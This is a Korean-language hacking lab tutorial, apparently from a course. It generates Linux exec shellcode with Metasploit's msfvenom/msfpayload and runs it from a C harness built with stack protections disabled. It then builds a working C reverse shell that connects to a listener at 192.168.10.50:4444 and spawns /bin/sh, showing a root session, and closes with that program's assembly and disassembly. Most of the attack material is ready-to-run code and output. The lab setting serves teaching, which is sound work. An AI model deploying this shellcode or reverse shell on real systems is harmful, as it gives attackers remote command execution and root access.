[참고] 쉘코드(ShellCode) 만드는 방법2

(2) 칼리리눅스의 payload 사용하여 쉘코드 만들기

 

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!! 다음 문서에서 KaliLinux 2.X 버전은 상단의 정보를 사용하세요      !!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

 

■ 사용시스템

- KaliLinux

 

 

다음과 같은 임의의 명령어를 수행할 수 있는 쉘코드를 만들어 보자.

/bin/ls

/bin/cal

 

 

(on KaliLinux)

 

① msfpayload 명령어 사용법 확인

 

■ (칼리리눅스 2.0) 아래와 같이 실습한다.

# cd /test

# msfvenom -h

# msfvenom -l

# msfvenom -l | egrep 'linux/x64/exec'

# msfvenom -p linux/x64/exec --payload-options

# msfvenom --help-formats

# msfvenom --help-platforms

 

# cd /test

# msfpayload -h

Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>   OPTIONS:   -h Help banner -l List available payloads

 

② payload 목록 검색 및 확인

 

■ (칼리리눅스 2.0) 아래와 같이 실습한다.

# uname -a

-> 32bit(Test 시스템 : KaliLinux(32bits))

# msfvenom -l | egrep '(linux/x64/exec|linux/x86/exec)'

linux/x64/exec Execute an arbitrary command

linux/x86/exec Execute an arbitrary command

 

# msfpayload -l | egrep '(linux/x64/exec|linux/x86/exec)'

linux/x64/exec Execute an arbitrary command linux/x86/exec Execute an arbitrary command

 

 

 

③ 지정된 payload의 summary 정보 확인

 

■ (칼리리눅스 2.0) 아래와 같이 실습한다.

(x86) # msfvenom -p linux/x86/exec --payload-options

(x64) # msfvenom -p linux/x64/exec --payload-options

 

(for x86) # msfpayload linux/x86/exec S /* S : Summary Information */

Name: Linux Execute Command Module: payload/linux/x86/exec Platform: Linux Arch: x86 Needs Admin: No Total size: 158 Rank: Normal   Provided by: vlad902 vlad902@gmail.com   Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute   Description: Execute an arbitrary command

 

(for x64) # msfpayload linux/x64/exec S

Name: Linux Execute Command Module: payload/linux/x64/exec Platform: Linux Arch: x86_64 Needs Admin: No Total size: 209 Rank: Normal   Provided by: ricky   Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute   Description: Execute an arbitrary command

 

 

 

④ 쉘코드(/bin/ls) 생성

 

■ (칼리리눅스 2.0) 아래와 같이 실습한다.

# cd /test

# msfvenom --help-formats

(x86) # msfvenom -p linux/x86/exec CMD=/bin/ls -f c -o myshellcode.c

(x64) # msfvenom -p linux/x64/exec CMD=/bin/ls -f c -o myshellcode.c

# cat myshellcode.c

# vi shell.c

# gcc -fno-stack-protector -z execstack -o shell shell.c

# ./shell

 

# msfpayload linux/x86/exec CMD=/bin/ls C > myshellcode.c

# cat myshellcode.c

/* * linux/x86/exec - 43 bytes * http://www.metasploit.com * VERBOSE=false, PrependFork=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, CMD=/bin/ls */ unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f" "\x62\x69\x6e\x2f\x6c\x73\x00\x57\x53\x89\xe1\xcd\x80";

 

# vi shell.c

#include <stdio.h>   unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f" "\x62\x69\x6e\x2f\x6c\x73\x00\x57\x53\x89\xe1\xcd\x80";   int main() { int (*shell)(); shell=(int (*)()) shellcode; (int)(*shell)(); return 0; }

 

# gcc -fno-stack-protector -z execstack -o shell shell.c

# ./shell

a.out linux216.txt myshellcode shell testfile.sh linux215.txt linux226.txt myshellcode.c shell.c

-> /bin/ls 명령어 수행 결과와 같다.

 

 

⑤ 다른 쉘코드(/usr/bin/cal) 생성

 

■ (칼리리눅스 2.0) 아래와 같이 실습한다.

# cd /test

# msfvenom --help-formats

(x86) # msfvenom -p linux/x86/exec CMD=/usr/bin/cal -f c -o myshellcode.c

(x64) # msfvenom -p linux/x64/exec CMD=/usr/bin/cal -f c -o myshellcode.c

# cat myshellcode.c

# vi shell.c

# gcc -fno-stack-protector -z execstack -o shell shell.c

# ./shell

 

# msfpayload linux/x86/exec CMD=/usr/bin/cal C > myshellcode.c

# cat myshellcode.c

/* * linux/x86/exec - 48 bytes * http://www.metasploit.com * VERBOSE=false, PrependFork=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, CMD=/usr/bin/cal */ unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0d\x00\x00\x00\x2f" "\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x61\x6c\x00\x57\x53\x89" "\xe1\xcd\x80";

 

# vi shell.c

#include <stdio.h>   unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0d\x00\x00\x00\x2f" "\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x61\x6c\x00\x57\x53\x89" "\xe1\xcd\x80";   int main() { int (*shell)(); shell=(int (*)()) shellcode; (int)(*shell)(); return 0; }

 

# gcc -fno-stack-protector -z execstack -o shell shell.c

# ./shell

October 2015 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

-> /usr/bin/cal 명령어 수행결과와 같다.

 

 

 

(3) 리버스로 배시쉘을 연결하는 작은 쉘코드 제작

 

■ 사용시스템

- KaliLinux

- HackMe

 

(KaliLinux)

 

① 칼리리눅스에서 4444 포트를 listen 상태로 동작

# apt-get -y install nc

# nc -l -vv -p 4444

 

(HackMe)

 

② C 언어로 reverse tcp connection 할 수 있는 프로그램 제작 및 테스트

 

[참고] (Kalilinux) -- ssh --> (HackMe)

# ssh level1@192.168.10.240

level1/level1

$ su -

관리자 암호입력

# export TERM=xterm

# clear

 

$ su - root

root 사용자의 암호 입력

# mkdir -p /root/bin

# cd /root/bin

# vi myreverse.c

#include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <unistd.h> #include <errno.h>   int main(int argc, char **arv) { struct sockaddr_in serveraddr; int server_sockfd; int client_len; char buf[80]; char rbuf[80]; char *cmdBuf[2] = { "/bin/sh", (char *)0};   // 소켓 설정 server_sockfd = socket(AF_INET, SOCK_STREAM, 6); serveraddr.sin_family = AF_INET; serveraddr.sin_addr.s_addr = inet_addr("192.168.10.50"); /* server's ip */ serveraddr.sin_port = htons(atoi("4444")); /* server's port */ client_len = sizeof(serveraddr);   connect(server_sockfd, (struct sockaddr *)&serveraddr, client_len);   dup2(server_sockfd, 0); /* 소켓의 정보 중 fd(0)으로 복사 */ dup2(server_sockfd, 1); /* 소켓의 정보 중 fd(1)으로 복사 */ dup2(server_sockfd, 2); /* 소켓의 정보 중 fd(2)으로 복사 */   execve("/bin/sh", cmdBuf, 0); }

 

# gcc -o myreverse myreverse.c

# ./myreverse

 

 

(KaliLinux)

 

# nc -l -vv -p 4444

listening on [any] 4444 ... 192.168.10.240: inverse host lookup failed: Unknown host connect to [192.168.10.50] from (UNKNOWN) [192.168.10.240] 32779 <ENTER> id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) pwd /root/bin exit send 13, recvd 98

 

③ dup2 함수의 의미에 대한 실습

■ (1차 테스트) "// dup2(server_sockfd, 0);"

KaliLinux	HackMe
# nc -l -vv -p 4444   ls /* 정상 동작 하지 않는다. */	# vi myreverse.c // dup2(server_sockfd, 0); # gcc -o myreverse1 myreverse.c   # ./myreverse1   ls /* 출력 내용이 kalilinux로 간다. */

<!--[if !supportEmptyParas]--> <!--[endif]-->

■ (2차 테스트) "// dup2(server_sockfd, 1);"

KaliLinux	HackMe
# nc -l -vv -p 4444   ls /var /nodir /* 정상출력은 HackMe로 간다. */	# vi myreverse.c // dup2(server_sockfd, 1); # gcc -o myreverse1 myreverse.c   # ./myreverse1

<!--[if !supportEmptyParas]--> <!--[endif]-->

■ (3차 테스트) "// dup2(server_sockfd, 2);"

KaliLinux	HackMe
# nc -l -vv -p 4444   ls /var /nodir /* 에러출력은 HackMe로 간다. */	# vi myreverse.c // dup2(server_sockfd, 2); # gcc -o myreverse1 myreverse.c   # ./myreverse1

 

(HackMe)

 

④ C언어로 만든 myreverse.c 파일을 assembly 언어로 변경

# gcc -S -o myreverse.asm myreverse.c

# vi myreverse.asm

.string "192.168.10.50" .LC2: .string "4444" .text .globl main .type main,@function main: pushl %ebp movl %esp, %ebp subl $216, %esp andl $-16, %esp movl $0, %eax subl %eax, %esp movl $.LC0, -208(%ebp) movl $0, -204(%ebp) subl $4, %esp pushl $6 pushl $1 pushl $2 call socket addl $16, %esp movl %eax, -28(%ebp) movw $2, -24(%ebp) subl $12, %esp pushl $.LC1 call inet_addr addl $16, %esp movl %eax, -20(%ebp) subl $12, %esp pushl $.LC2 call atoi addl $16, %esp movzwl %ax, %eax subl $12, %esp pushl %eax call htons addl $16, %esp movw %ax, -22(%ebp) movl $16, -32(%ebp) subl $4, %esp pushl -32(%ebp) leal -24(%ebp), %eax pushl %eax pushl -28(%ebp) call connect addl $16, %esp subl $8, %esp pushl $0 pushl -28(%ebp) call dup2 addl $16, %esp subl $8, %esp pushl $1 pushl -28(%ebp) call dup2

 

 

 

⑤ myreverse 실행 파일에서 OP Code 추출

# objdump -d ./myreverse

./myreverse: file format elf32-i386   Disassembly of section .init:   0804830c <_init>: 804830c: 55 push %ebp 804830d: 89 e5 mov %esp,%ebp 804830f: 83 ec 08 sub $0x8,%esp 8048312: e8 c1 00 00 00 call 80483d8 <call_gmon_start> 8048317: e8 1c 01 00 00 call 8048438 <frame_dummy> 804831c: e8 77 02 00 00 call 8048598 <__do_global_ctors_aux> 8048321: c9 leave 8048322: c3 ret Disassembly of section .plt:   08048324 <.plt>: 8048324: ff 35 ec 96 04 08 pushl 0x80496ec 804832a: ff 25 f0 96 04 08 jmp *0x80496f0 8048330: 00 00 add %al,(%eax) 8048332: 00 00 add %al,(%eax) 8048334: ff 25 f4 96 04 08 jmp *0x80496f4 804833a: 68 00 00 00 00 push $0x0 804833f: e9 e0 ff ff ff jmp 8048324 <_init+0x18> 8048344: ff 25 f8 96 04 08 jmp *0x80496f8 804834a: 68 08 00 00 00 push $0x8 804834f: e9 d0 ff ff ff jmp 8048324 <_init+0x18> 8048354: ff 25 fc 96 04 08 jmp *0x80496fc 804835a: 68 10 00 00 00 push $0x10 804835f: e9 c0 ff ff ff jmp 8048324 <_init+0x18> 8048364: ff 25 00 97 04 08 jmp *0x8049700 804836a: 68 18 00 00 00 push $0x18 804836f: e9 b0 ff ff ff jmp 8048324 <_init+0x18> 8048374: ff 25 04 97 04 08 jmp *0x8049704 804837a: 68 20 00 00 00 push $0x20 804837f: e9 a0 ff ff ff jmp 8048324 <_init+0x18> 8048384: ff 25 08 97 04 08 jmp *0x8049708 804838a: 68 28 00 00 00 push $0x28 804838f: e9 90 ff ff ff jmp 8048324 <_init+0x18> 8048394: ff 25 0c 97 04 08 jmp *0x804970c 804839a: 68 30 00 00 00 push $0x30 804839f: e9 80 ff ff ff jmp 8048324 <_init+0x18> 80483a4: ff 25 10 97 04 08 jmp *0x8049710 80483aa: 68 38 00 00 00 push $0x38 80483af: e9 70 ff ff ff jmp 8048324 <_init+0x18> Disassembly of section .text:   080483b4 <_start>: 80483b4: 31 ed xor %ebp,%ebp 80483b6: 5e pop %esi 80483b7: 89 e1 mov %esp,%ecx 80483b9: 83 e4 f0 and $0xfffffff0,%esp 80483bc: 50 push %eax 80483bd: 54 push %esp 80483be: 52 push %edx 80483bf: 68 64 85 04 08 push $0x8048564 80483c4: 68 34 85 04 08 push $0x8048534 80483c9: 51 push %ecx 80483ca: 56 push %esi 80483cb: 68 64 84 04 08 push $0x8048464 80483d0: e8 7f ff ff ff call 8048354 <_init+0x48> 80483d5: f4 hlt 80483d6: 90 nop 80483d7: 90 nop   080483d8 <call_gmon_start>: 80483d8: 55 push %ebp 80483d9: 89 e5 mov %esp,%ebp 80483db: 53 push %ebx 80483dc: 50 push %eax 80483dd: e8 00 00 00 00 call 80483e2 <call_gmon_start+0xa> 80483e2: 5b pop %ebx 80483e3: 81 c3 06 13 00 00 add $0x1306,%ebx 80483e9: 8b 83 2c 00 00 00 mov 0x2c(%ebx),%eax 80483ef: 85 c0 test %eax,%eax 80483f1: 74 02 je 80483f5 <call_gmon_start+0x1d> 80483f3: ff d0 call *%eax 80483f5: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80483f8: c9 leave 80483f9: c3 ret 80483fa: 90 nop 80483fb: 90 nop   080483fc <__do_global_dtors_aux>: 80483fc: 55 push %ebp 80483fd: 89 e5 mov %esp,%ebp 80483ff: 83 ec 08 sub $0x8,%esp 8048402: 80 3d 18 97 04 08 00 cmpb $0x0,0x8049718 8048409: 75 29 jne 8048434 <__do_global_dtors_aux+0x38> 804840b: a1 08 96 04 08 mov 0x8049608,%eax 8048410: 8b 10 mov (%eax),%edx 8048412: 85 d2 test %edx,%edx 8048414: 74 17 je 804842d <__do_global_dtors_aux+0x31> 8048416: 89 f6 mov %esi,%esi 8048418: 83 c0 04 add $0x4,%eax 804841b: a3 08 96 04 08 mov %eax,0x8049608 8048420: ff d2 call *%edx 8048422: a1 08 96 04 08 mov 0x8049608,%eax 8048427: 8b 10 mov (%eax),%edx 8048429: 85 d2 test %edx,%edx 804842b: 75 eb jne 8048418 <__do_global_dtors_aux+0x1c> 804842d: c6 05 18 97 04 08 01 movb $0x1,0x8049718 8048434: c9 leave 8048435: c3 ret 8048436: 89 f6 mov %esi,%esi   08048438 <frame_dummy>: 8048438: 55 push %ebp 8048439: 89 e5 mov %esp,%ebp 804843b: 83 ec 08 sub $0x8,%esp 804843e: a1 e4 96 04 08 mov 0x80496e4,%eax 8048443: 85 c0 test %eax,%eax 8048445: 74 19 je 8048460 <frame_dummy+0x28> 8048447: b8 00 00 00 00 mov $0x0,%eax 804844c: 85 c0 test %eax,%eax 804844e: 74 10 je 8048460 <frame_dummy+0x28> 8048450: 83 ec 0c sub $0xc,%esp 8048453: 68 e4 96 04 08 push $0x80496e4 8048458: e8 a3 7b fb f7 call 0 <_init-0x804830c> 804845d: 83 c4 10 add $0x10,%esp 8048460: c9 leave 8048461: c3 ret 8048462: 90 nop 8048463: 90 nop   08048464 <main>: 8048464: 55 push %ebp 8048465: 89 e5 mov %esp,%ebp 8048467: 81 ec d8 00 00 00 sub $0xd8,%esp 804846d: 83 e4 f0 and $0xfffffff0,%esp 8048470: b8 00 00 00 00 mov $0x0,%eax 8048475: 29 c4 sub %eax,%esp 8048477: c7 85 30 ff ff ff e0 movl $0x80485e0,0xffffff30(%ebp) 804847e: 85 04 08 8048481: c7 85 34 ff ff ff 00 movl $0x0,0xffffff34(%ebp) 8048488: 00 00 00 804848b: 83 ec 04 sub $0x4,%esp 804848e: 6a 06 push $0x6 8048490: 6a 01 push $0x1 8048492: 6a 02 push $0x2 8048494: e8 0b ff ff ff call 80483a4 <_init+0x98> 8048499: 83 c4 10 add $0x10,%esp 804849c: 89 45 e4 mov %eax,0xffffffe4(%ebp) 804849f: 66 c7 45 e8 02 00 movw $0x2,0xffffffe8(%ebp) 80484a5: 83 ec 0c sub $0xc,%esp 80484a8: 68 e8 85 04 08 push $0x80485e8 80484ad: e8 92 fe ff ff call 8048344 <_init+0x38> 80484b2: 83 c4 10 add $0x10,%esp 80484b5: 89 45 ec mov %eax,0xffffffec(%ebp) 80484b8: 83 ec 0c sub $0xc,%esp 80484bb: 68 f6 85 04 08 push $0x80485f6 80484c0: e8 af fe ff ff call 8048374 <_init+0x68> 80484c5: 83 c4 10 add $0x10,%esp 80484c8: 0f b7 c0 movzwl %ax,%eax 80484cb: 83 ec 0c sub $0xc,%esp 80484ce: 50 push %eax 80484cf: e8 b0 fe ff ff call 8048384 <_init+0x78> 80484d4: 83 c4 10 add $0x10,%esp 80484d7: 66 89 45 ea mov %ax,0xffffffea(%ebp) 80484db: c7 45 e0 10 00 00 00 movl $0x10,0xffffffe0(%ebp) 80484e2: 83 ec 04 sub $0x4,%esp 80484e5: ff 75 e0 pushl 0xffffffe0(%ebp) 80484e8: 8d 45 e8 lea 0xffffffe8(%ebp),%eax 80484eb: 50 push %eax 80484ec: ff 75 e4 pushl 0xffffffe4(%ebp) 80484ef: e8 a0 fe ff ff call 8048394 <_init+0x88> 80484f4: 83 c4 10 add $0x10,%esp 80484f7: 83 ec 08 sub $0x8,%esp 80484fa: 6a 00 push $0x0 80484fc: ff 75 e4 pushl 0xffffffe4(%ebp) 80484ff: e8 60 fe ff ff call 8048364 <_init+0x58> 8048504: 83 c4 10 add $0x10,%esp 8048507: 83 ec 08 sub $0x8,%esp 804850a: 6a 02 push $0x2 804850c: ff 75 e4 pushl 0xffffffe4(%ebp) 804850f: e8 50 fe ff ff call 8048364 <_init+0x58> 8048514: 83 c4 10 add $0x10,%esp 8048517: 83 ec 04 sub $0x4,%esp 804851a: 6a 00 push $0x0 804851c: 8d 85 30 ff ff ff lea 0xffffff30(%ebp),%eax 8048522: 50 push %eax 8048523: 68 e0 85 04 08 push $0x80485e0 8048528: e8 07 fe ff ff call 8048334 <_init+0x28> 804852d: 83 c4 10 add $0x10,%esp 8048530: c9 leave 8048531: c3 ret 8048532: 90 nop 8048533: 90 nop   08048534 <__libc_csu_init>: 8048534: 55 push %ebp 8048535: 89 e5 mov %esp,%ebp 8048537: 56 push %esi 8048538: 53 push %ebx 8048539: e8 ce fd ff ff call 804830c <_init> 804853e: b8 00 96 04 08 mov $0x8049600,%eax 8048543: 2d 00 96 04 08 sub $0x8049600,%eax 8048548: c1 f8 02 sar $0x2,%eax 804854b: 31 db xor %ebx,%ebx 804854d: 39 c3 cmp %eax,%ebx 804854f: 73 0f jae 8048560 <__libc_csu_init+0x2c> 8048551: 89 c6 mov %eax,%esi 8048553: 90 nop 8048554: ff 14 9d 00 96 04 08 call *0x8049600(,%ebx,4) 804855b: 43 inc %ebx 804855c: 39 f3 cmp %esi,%ebx 804855e: 72 f4 jb 8048554 <__libc_csu_init+0x20> 8048560: 5b pop %ebx 8048561: 5e pop %esi 8048562: c9 leave 8048563: c3 ret   08048564 <__libc_csu_fini>: 8048564: 55 push %ebp 8048565: 89 e5 mov %esp,%ebp 8048567: 53 push %ebx 8048568: 50 push %eax 8048569: b8 00 96 04 08 mov $0x8049600,%eax 804856e: 2d 00 96 04 08 sub $0x8049600,%eax 8048573: c1 f8 02 sar $0x2,%eax 8048576: 85 c0 test %eax,%eax 8048578: 8d 58 ff lea 0xffffffff(%eax),%ebx 804857b: 75 0b jne 8048588 <__libc_csu_fini+0x24> 804857d: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 8048580: c9 leave 8048581: e9 36 00 00 00 jmp 80485bc <_fini> 8048586: 89 f6 mov %esi,%esi 8048588: ff 14 9d 00 96 04 08 call *0x8049600(,%ebx,4) 804858f: 89 da mov %ebx,%edx 8048591: 4b dec %ebx 8048592: 85 d2 test %edx,%edx 8048594: 75 f2 jne 8048588 <__libc_csu_fini+0x24> 8048596: eb e5 jmp 804857d <__libc_csu_fini+0x19>   08048598 <__do_global_ctors_aux>: 8048598: 55 push %ebp 8048599: 89 e5 mov %esp,%ebp 804859b: 53 push %ebx 804859c: 52 push %edx 804859d: a1 d4 96 04 08 mov 0x80496d4,%eax 80485a2: 83 f8 ff cmp $0xffffffff,%eax 80485a5: bb d4 96 04 08 mov $0x80496d4,%ebx 80485aa: 74 0c je 80485b8 <__do_global_ctors_aux+0x20> 80485ac: 83 eb 04 sub $0x4,%ebx 80485af: ff d0 call *%eax 80485b1: 8b 03 mov (%ebx),%eax 80485b3: 83 f8 ff cmp $0xffffffff,%eax 80485b6: 75 f4 jne 80485ac <__do_global_ctors_aux+0x14> 80485b8: 58 pop %eax 80485b9: 5b pop %ebx 80485ba: c9 leave 80485bb: c3 ret Disassembly of section .fini:   080485bc <_fini>: 80485bc: 55 push %ebp 80485bd: 89 e5 mov %esp,%ebp 80485bf: 53 push %ebx 80485c0: 52 push %edx 80485c1: e8 00 00 00 00 call 80485c6 <_fini+0xa> 80485c6: 5b pop %ebx 80485c7: 81 c3 22 11 00 00 add $0x1122,%ebx 80485cd: e8 2a fe ff ff call 80483fc <__do_global_dtors_aux> 80485d2: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80485d5: c9 leave 80485d6: c3 ret